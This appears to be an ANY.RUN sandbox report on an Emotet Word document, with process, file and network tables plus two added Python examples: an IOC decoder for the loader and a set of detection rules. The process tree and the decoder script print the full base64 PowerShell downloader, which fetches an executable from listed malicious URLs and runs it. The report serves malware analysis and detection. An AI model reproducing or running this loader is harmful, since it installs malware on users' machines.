File name: | in1.doc |
Full analysis: | https://app.any.run/tasks/27731115-1dff-4192-ac8b-a968d22a2820 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a highly destructive malware family. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | May 20, 2019, 12:49:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: optimize PCI attitude, Subject: Licensed, Author: Ray Moen, Comments: Jewelery, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 14:32:00 2019, Last Saved Time/Date: Thu May 16 14:32:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | F3AE0ACE6557ECE43188C30D769443F3 |
SHA1: | 1C5CA07C0C6F60FBF9D1EC178067749AAAD7BD93 |
SHA256: | 5CCB438708F222F19C4FE396B87C6B246D9BC42B561443B7F4CD0C92DBC2547F |
SSDEEP: | 3072:577HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qQZjuYs72t34IQicZbp:577HUUUUUUUUUUUUUUUUUUUT52V5ZjuB |
Extension | Description | Match (%)
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | optimize PCI attitude |
Subject: | Licensed |
Author: | Ray Moen |
Keywords: | - |
Comments: | Jewelery |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 13:32:00 |
ModifyDate: | 2019:05:16 13:32:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 173 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Reichel Inc |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 202 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
Manager: | Gibson |
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\in1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2484 | PowErsHell -enC JABIADIAOQA5ADAAOAAxADUAPQAnAFIAMQAzADYANgAxADQAJwA7ACQAWQA3ADUAMwA1AF8AMQAgAD0AIAAnADMANQAxACcAOwAkAHoANQAzADQANQA5AD0AJwBSAF8ANwA0ADIAMwA1ACcAOwAkAGoAMgA0ADMAMQA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZADcANQAzADUAXwAxACsAJwAuAGUAeABlACcAOwAkAFEAOQA1ADQAOQAwAD0AJwBWADMAMgBfADMAMgA3ACcAOwAkAEEAOQAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABOAGAARQBUAC4AdwBgAEUAYABCAEMATABpAGAAZQBuAHQAOwAkAFcAMABfADAAMwA2AD0AJwBoAHQAdABwADoALwAvAGkAdABlAGsAcwBjAG8AbQBwAGEAbgB5AC4AYwBvAG0ALwB3AHAALwBaAGIAUQBDAE4AcwBtAGYALwBAAGgAdAB0AHAAOgAvAC8AcAB1AG4AagBhAGIAdQBwAG4AZQB3AHMALgBjAG8AbQAvAG0AZQBuAHUAcwBsAC8AZABTAFkATABwAGIAcgBPAE0ALwBAAGgAdAB0AHAAOgAvAC8AbQBpAGsAeQBhAHMAawBpAHQAYQBwAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ASQBSAGIAUQBWAEUASABEAC8AQABoAHQAdABwADoALwAvAG8AZABhAHMAYQBqAGEALgBtAHkALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyAHQAeQB1AGoAeABfAHUAbwBkAGMAOQAtADYANAAzADgAMQA5ADkAMQAvAEAAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHAAcwB1AGEAZABlAC4AYwBvAC4AdQBrAC8AdwBwAC8AVwB4AGEAcABGAHkAUgBxAHUALwAnAC4AcwBQAEwAaQB0ACgAJwBAACcAKQA7ACQAcQA5AF8ANgA0ADIAOQA2AD0AJwBBAF8AXwBfADEAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQAVAA2ADUAXwAxADcANAAgAGkAbgAgACQAVwAwAF8AMAAzADYAKQB7AHQAcgB5AHsAJABBADkAMQA0ADEAOAAuAGQAbwB3AG4AbABPAEEARABmAEkATABFACgAJABUADYANQBfADEANwA0ACwAIAAkAGoAMgA0ADMAMQA4ACkAOwAkAGQAMgA5ADMANgAyAF8AXwA9ACcAYgAyADkAXwAwADMANQA4ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADUAOQA0ADIAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAOwAkAGgAOAA5ADgAOAAyADUANgA9ACcAawA0ADMAMQA0ADEAJwA7AGIAcgBlAGEAawA7ACQAcAA3ADUAOABfADEAPQAnAEMAMQA4ADYANABfADIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBfADYAOQAxADYANgAzAD0AJwBxADcAXwA3ADIAMAA2ADYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1792 | "C:\Users\admin\351.exe" | C:\Users\admin\351.exe | — | PowErsHell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2176 | --deb5006d | C:\Users\admin\351.exe | — | 351.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2196 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 351.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2920 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
128 | "C:\Users\admin\AppData\Local\soundser\oKOyp.exe" | C:\Users\admin\AppData\Local\soundser\oKOyp.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2748 | --6e1b8acb | C:\Users\admin\AppData\Local\soundser\oKOyp.exe | — | oKOyp.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2800 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | oKOyp.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3900 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM
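The `-enC` switch on PID 2484 is an abbreviation of `-EncodedCommand`, which takes the base64 of the script's UTF-16LE bytes; the only obfuscation in the decoded script is backtick escapes inside bare words (N`ET.w`E`BCLi`ent), 'a'+'b' string concatenation, and call-operator invocation of cmdlet names built from such strings (&('new-object'), .('Get-Item')). The Python below is an added example, not part of the ANY.RUN report: it decodes the blob exactly as captured in the process tree, normalises those three tricks, and pulls out the download list, the drop path and the minimum size the loader checks before it runs the file. The values it recovers line up with the rest of the report: the five URLs are the four requested in the HTTP table plus a fifth (dev.psuade.co.uk) that never appears there, consistent with the loop breaking after the first response of at least 25942 bytes, which was the 74.0 Kb body from odasaja.my; the drop path is the C:\Users\admin\351.exe that starts as PID 1792.

```python
import base64
import re

# The -enC argument captured for PID 2484 above, verbatim.
ENCODED_COMMAND = "JABIADIAOQA5ADAAOAAxADUAPQAnAFIAMQAzADYANgAxADQAJwA7ACQAWQA3ADUAMwA1AF8AMQAgAD0AIAAnADMANQAxACcAOwAkAHoANQAzADQANQA5AD0AJwBSAF8ANwA0ADIAMwA1ACcAOwAkAGoAMgA0ADMAMQA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZADcANQAzADUAXwAxACsAJwAuAGUAeABlACcAOwAkAFEAOQA1ADQAOQAwAD0AJwBWADMAMgBfADMAMgA3ACcAOwAkAEEAOQAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABOAGAARQBUAC4AdwBgAEUAYABCAEMATABpAGAAZQBuAHQAOwAkAFcAMABfADAAMwA2AD0AJwBoAHQAdABwADoALwAvAGkAdABlAGsAcwBjAG8AbQBwAGEAbgB5AC4AYwBvAG0ALwB3AHAALwBaAGIAUQBDAE4AcwBtAGYALwBAAGgAdAB0AHAAOgAvAC8AcAB1AG4AagBhAGIAdQBwAG4AZQB3AHMALgBjAG8AbQAvAG0AZQBuAHUAcwBsAC8AZABTAFkATABwAGIAcgBPAE0ALwBAAGgAdAB0AHAAOgAvAC8AbQBpAGsAeQBhAHMAawBpAHQAYQBwAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ASQBSAGIAUQBWAEUASABEAC8AQABoAHQAdABwADoALwAvAG8AZABhAHMAYQBqAGEALgBtAHkALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyAHQAeQB1AGoAeABfAHUAbwBkAGMAOQAtADYANAAzADgAMQA5ADkAMQAvAEAAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHAAcwB1AGEAZABlAC4AYwBvAC4AdQBrAC8AdwBwAC8AVwB4AGEAcABGAHkAUgBxAHUALwAnAC4AcwBQAEwAaQB0ACgAJwBAACcAKQA7ACQAcQA5AF8ANgA0ADIAOQA2AD0AJwBBAF8AXwBfADEAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQAVAA2ADUAXwAxADcANAAgAGkAbgAgACQAVwAwAF8AMAAzADYAKQB7AHQAcgB5AHsAJABBADkAMQA0ADEAOAAuAGQAbwB3AG4AbABPAEEARABmAEkATABFACgAJABUADYANQBfADEANwA0ACwAIAAkAGoAMgA0ADMAMQA4ACkAOwAkAGQAMgA5ADMANgAyAF8AXwA9ACcAYgAyADkAXwAwADMANQA4ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADUAOQA0ADIAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagAyADQAMwAxADgAOwAkAGgAOAA5ADgAOAAyADUANgA9ACcAawA0ADMAMQA0ADEAJwA7AGIAcgBlAGEAawA7ACQAcAA3ADUAOABfADEAPQAnAEMAMQA4ADYANABfADIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBfADYAOQAxADYANgAzAD0AJwBxADcAXwA3ADIAMAA2ADYAJwA="


def decode_encoded_command(b64):
    """-EncodedCommand carries the base64 of the script's UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script):
    """Undo the three cosmetic tricks this loader uses; semantics are unchanged."""
    # 1. A backtick inside a bare word (N`ET.w`E`BCLi`ent) is a no-op escape.
    script = script.replace("`", "")
    # 2. 'a'+'b' string concatenation -> 'ab'; repeat until a fixed point is reached.
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        joined = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if joined == script:
            break
        script = joined
    # 3. &('new-object') / .('Get-Item') call operator on a literal -> plain cmdlet name.
    return re.sub(r"[&.]\('([^']+)'\)", r"\1", script)


def extract_iocs(b64):
    """Return the URL list, drop path and size floor from an encoded Emotet loader."""
    clean = deobfuscate(decode_encoded_command(b64))
    # Download list: the 'url1@url2@...'.split('@') idiom.
    m = re.search(r"'([^']*)'\.split\('@'\)", clean, re.I)
    urls = m.group(1).split("@") if m else []
    # Drop path is built as $env:userprofile+'\'+$var+'.exe'; resolve $var's literal.
    drop_path = None
    m = re.search(r"\$env:userprofile\+'\\'\+(\$\w+)\+'\.exe'", clean, re.I)
    if m:
        assign = re.search(re.escape(m.group(1)) + r"\s*=\s*'([^']*)'", clean)
        if assign:
            drop_path = "%USERPROFILE%\\" + assign.group(1) + ".exe"
    # The file is only executed when (Get-Item $path).Length -ge <n>.
    m = re.search(r"\.length\s+-ge\s+(\d+)", clean, re.I)
    min_size = int(m.group(1)) if m else None
    return {"urls": urls, "drop_path": drop_path, "min_size": min_size, "script": clean}


if __name__ == "__main__":
    iocs = extract_iocs(ENCODED_COMMAND)
    print(iocs["script"])
    for url in iocs["urls"]:
        print("download:", url)
    print("drop:", iocs["drop_path"], "min size:", iocs["min_size"])
```

The concatenation pass runs to a fixed point because `'G'+'et-Ite'+'m'` needs two rounds, and the call-operator rewrite is applied only after it so that `&('n'+'ew'+'-object')` has already become `&('new-object')`. The recovered URLs are what the loader will request in order, so they are the values to block or hunt for, not the capitalisation-randomised variable names.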
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFA8A.tmp.cvr | — | — | —
2484 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJ07ONEDAEMXKIUZ66HO.temp | — | — | —
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 3BB45249F5DCAB135638954EB123C31F | 7644A3FC82E37797B4A0BDE273A0E16384E00694454280DCC3C3D999CB25C141
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F2D5F16.wmf | wmf | B63BE7473C1B76F8E99A46159172C8D4 | 616D04554DA4E7B01D9A5AF63299995821D0404907B80CD853DE0616539CFAD0
332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 946E0BB5DC107E8ED4F6FA5AF93B6997 | 48D75A3999E84C616FFEAA8F59069EBA387C75A6661E6BD3512ADCDDC7B41184
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\256981F.wmf | wmf | 47008553A751D4AC0D368BA8D67DB132 | B328A42326228EB95BA90BCC89B2456B3B0693C14A9E174E5B451EECCE833290
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$in1.doc | pgc | D265588843B6F955520FD26A701C1267 | F9AF6147E83303BD8E7D230CA96B80DC7C90854953D251C92B3322E97593543B
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF96329.wmf | wmf | 5220664E510AA370F19A6FD47450E715 | 25724565304BFEA207794C4A403A5E993F148864AB737FBD3652822C3EA8ED98
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A91EFDB.wmf | wmf | A6F44A0A5C7134025C56BADCC31BD9AC | 2F89CC7E7D946372404343147C8DC0C77A0AB0AC9C4351631CFA9A642F0AF3A2
332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9B6F685.wmf | wmf | 3A90559995537BB9D8699F079D9ACA05 | 662B5EB7201120EB138CE9A964789C70A46E8077AA8BDF24BD3F2E245EE16814
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2484 | PowErsHell.exe | GET | 200 | 31.186.8.168:80 | http://mikyaskitap.com/cgi-bin/IRbQVEHD/ | TR | — | — | malicious |
2484 | PowErsHell.exe | GET | 404 | 201.148.107.46:80 | http://itekscompany.com/wp/ZbQCNsmf/ | CL | html | 329 b | suspicious |
2484 | PowErsHell.exe | GET | 200 | 101.99.70.229:80 | http://odasaja.my/wp-content/02tyujx_uodc9-64381991/ | MY | executable | 74.0 Kb | suspicious |
2484 | PowErsHell.exe | GET | 404 | 107.161.176.66:80 | http://punjabupnews.com/menusl/dSYLpbrOM/ | US | html | 48.4 Kb | suspicious |
2920 | soundser.exe | POST | 200 | 69.251.12.43:80 | http://69.251.12.43/ringin/xian/ | US | binary | 65.6 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2484 | PowErsHell.exe | 107.161.176.66:80 | punjabupnews.com | HostDime.com, Inc. | US | unknown |
2484 | PowErsHell.exe | 201.148.107.46:80 | itekscompany.com | Gtd Internet S.A. | CL | suspicious |
2484 | PowErsHell.exe | 101.99.70.229:80 | odasaja.my | Shinjiru Technology Sdn Bhd | MY | suspicious |
2484 | PowErsHell.exe | 31.186.8.168:80 | mikyaskitap.com | SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti. | TR | malicious |
2920 | soundser.exe | 69.251.12.43:80 | — | Comcast Cable Communications, LLC | US | malicious |
Domain | IP | Reputation
---|---|---
itekscompany.com | — | suspicious
punjabupnews.com | — | suspicious
mikyaskitap.com | — | malicious
odasaja.my | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
2484 | PowErsHell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2484 | PowErsHell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2484 | PowErsHell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2920 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
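The Suricata signatures above only see the network side of this chain. The process tree carries host-side signals of its own: the encoded PowerShell (PID 2484) is parented by wmiprvse.exe rather than WINWORD.EXE, which is what a macro calling WMI's Win32_Process.Create produces, so a rule that only looks for Office spawning PowerShell would miss it; PowerShell then starts an executable from the root of the user profile (PID 1792); and 351.exe, soundser.exe and oKOyp.exe each re-launch themselves with a single --<8 hex digits> argument (PIDs 2176, 2920, 2748, 3900). The Python below is an added example, not ANY.RUN's code: the process-start events are constructed from the table (the -enC blob is abbreviated), the rule names are mine, and the user-writable-path pattern and the list of script hosts are assumptions a real deployment would tune.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcStart:
    pid: int
    image: str    # full path of the started image
    cmdline: str
    parent: str   # image name of the creating process


# Constructed from the process tree on this page; the -enC blob is abbreviated.
EVENTS = [
    ProcStart(332, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\in1.doc"',
              "explorer.exe"),
    ProcStart(2484, r"C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe",
              "PowErsHell -enC JABIADIAOQA5ADAAOAAxADUAPQAn...", "wmiprvse.exe"),
    ProcStart(1792, r"C:\Users\admin\351.exe", r'"C:\Users\admin\351.exe"', "PowErsHell.exe"),
    ProcStart(2176, r"C:\Users\admin\351.exe", "--deb5006d", "351.exe"),
    ProcStart(2196, r"C:\Users\admin\AppData\Local\soundser\soundser.exe",
              r'"C:\Users\admin\AppData\Local\soundser\soundser.exe"', "351.exe"),
    ProcStart(2920, r"C:\Users\admin\AppData\Local\soundser\soundser.exe", "--3ab57678", "soundser.exe"),
    ProcStart(128, r"C:\Users\admin\AppData\Local\soundser\oKOyp.exe",
              r'"C:\Users\admin\AppData\Local\soundser\oKOyp.exe"', "soundser.exe"),
    ProcStart(2748, r"C:\Users\admin\AppData\Local\soundser\oKOyp.exe", "--6e1b8acb", "oKOyp.exe"),
    ProcStart(2800, r"C:\Users\admin\AppData\Local\soundser\soundser.exe",
              r'"C:\Users\admin\AppData\Local\soundser\soundser.exe"', "oKOyp.exe"),
    ProcStart(3900, r"C:\Users\admin\AppData\Local\soundser\soundser.exe", "--3ab57678", "soundser.exe"),
]

# Assumption: these are the script hosts worth watching; tune per environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: an .exe directly under a profile root, or anywhere under AppData\Local.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(?:[^\\]+\.exe$|appdata\\local\\)", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_encoded_command_flag(token):
    """powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand."""
    t = token.lower().lstrip("-/")
    return t in ("e", "ec") or (len(t) >= 2 and "encodedcommand".startswith(t))


def classify(ev):
    """Return the names of the rules that fire on one process-start event."""
    hits = []
    name = image_name(ev.image)
    parent = ev.parent.lower()
    tokens = ev.cmdline.split()
    # R1: encoded PowerShell created by the WMI provider host. The Office process
    # that asked for it is not in the parent chain, so parent-based Office rules miss it.
    if name in ("powershell.exe", "pwsh.exe") and parent == "wmiprvse.exe" \
            and any(is_encoded_command_flag(t) for t in tokens[1:]):
        hits.append("R1_wmi_encoded_powershell")
    # R2: a script host starting an executable from a user-writable location.
    if parent in SCRIPT_HOSTS and USER_WRITABLE.search(ev.image):
        hits.append("R2_script_host_runs_user_exe")
    # R3: a binary re-launching itself with nothing but a --<8 hex digits> argument.
    if parent == name and re.fullmatch(r"--[0-9a-f]{8}", ev.cmdline):
        hits.append("R3_self_relaunch_hex_arg")
    return hits


def scan(events):
    """Map pid -> fired rules for every event that matched at least one rule."""
    findings = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, ", ".join(rules))
```

R1 keys on the parent being wmiprvse.exe on purpose: the WMI provider host rarely launches an encoded PowerShell in a healthy environment, whereas the WINWORD.EXE link that most Office rules depend on is exactly what this chain does not have. R3 is the noisiest of the three on its own and is best used to corroborate R1 or R2 rather than to alert by itself.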